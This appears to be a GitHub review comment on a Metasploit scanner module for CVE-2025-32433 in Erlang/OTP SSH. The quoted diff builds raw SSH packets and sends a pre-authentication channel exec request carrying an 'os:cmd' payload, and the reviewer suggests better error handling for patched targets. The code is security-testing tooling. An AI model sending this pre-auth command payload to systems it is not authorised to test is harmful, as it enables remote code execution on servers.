modules/auxiliary/scanner/ssh/ssh_erlangotp.rb

```diff
@@ -0,0 +1,182 @@
+    "\x62" +
+      [channel_id].pack('N') +
+      string_payload('exec') +
+      "\x01" +
+      string_payload("os:cmd(\"#{command}\").")
+  end
+
+  # Builds a minimal but valid SSH_MSG_KEXINIT packet
+  def build_kexinit
+    cookie = "\x00" * 16
+
+    "\x14" +
+      cookie +
+      name_list(
+        [
+          'curve25519-sha256',
+          'ecdh-sha2-nistp256',
+          'diffie-hellman-group-exchange-sha256',
+          'diffie-hellman-group14-sha256'
+        ]
+      ) +
+      name_list(['rsa-sha2-256', 'rsa-sha2-512']) +
+      name_list(['aes128-ctr']) * 2 +
+      name_list(['hmac-sha1']) * 2 +
+      name_list(['none']) * 2 +
+      name_list([]) * 2 +
+      "\x00" +
+      [0].pack('N')
+  end
+
+  def message(msg)
+    "ssh://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  # Formats a list of names into an SSH-compatible string (comma-separated)
+  def name_list(names)
+    string_payload(names.join(','))
+  end
+
+  # Pads a packet to match SSH framing
+  def pad_packet(payload, block_size)
+    min_padding = 4
+
+    payload_length = payload.length
+    padding_len = block_size - ((payload_length + 5) % block_size)
+    padding_len += block_size if padding_len < min_padding
+
+    [(payload_length + 1 + padding_len)].pack('N') +
+      [padding_len].pack('C') +
+      payload +
+      "\x00" * padding_len
+  end
+
+  # Helper to format SSH string (4-byte length + bytes)
+  def string_payload(str)
+    s_bytes = str.encode('utf-8')
+    [s_bytes.length].pack('N') + s_bytes
+  end
+
+  def run_host(target_host)
+    connect
+
+    sock.put("SSH-2.0-OpenSSH_8.9\r\n")
+    banner = sock.get_once(1024, 10)
+    unless banner
+      print_status(message('No banner received'))
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless banner.to_s.downcase.include?('erlang')
+      print_status(message("Not an Erlang SSH service: #{banner.strip}"))
+      return Exploit::CheckCode::Safe
+    end
+    sleep(0.5)
+
+    print_status(message('Sending SSH_MSG_KEXINIT...'))
+    kex_packet = build_kexinit
+    sock.put(pad_packet(kex_packet, 8))
+    sleep(0.5)
+
+    response = sock.get_once(1024, 5)
+    unless response
+      print_status(message("Detected Erlang SSH service: #{banner.strip}, but no response to KEXINIT"))
+      return Exploit::CheckCode::Detected
+    end
+
+    print_status(message('Sending SSH_MSG_CHANNEL_OPEN...'))
+    chan_open = build_channel_open(0)
+    sock.put(pad_packet(chan_open, 8))
+    sleep(0.5)
+
+    print_status(message('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...'))
+    chan_req = build_channel_request(0, Rex::Text.rand_text_alpha(rand(4..8)).to_s)
+    sock.put(pad_packet(chan_req, 8))
+    sleep(0.5)
+
+    begin
+      sock.get_once(1024, 5)
+    # when the target is vulnerable you get at this step: rescue Rex::TimeoutError
+    rescue EOFError
+      # when the target is NOT vulnerable/patched at this step.
+      return Exploit::CheckCode::Safe
```

Comment:
I noticed when testing the patched target included in the PR, I wasn't seeing any messaging being printed. Also noticed that the patched target was causing the following error to be thrown:

```
[1] pry(#<Msf::Modules::Auxiliary__Scanner__Ssh__Ssh_erlangotp::MetasploitModule>)> e.class
=> Errno::ECONNRESET
```

This fixes the issue I was seeing:
```suggestion
    rescue EOFError, Errno::ECONNRESET
      # when the target is NOT vulnerable/patched at this step.
      print_error(message('The target is not vulnerable to CVE-2025-32433.'))
      return Exploit::CheckCode::Safe
```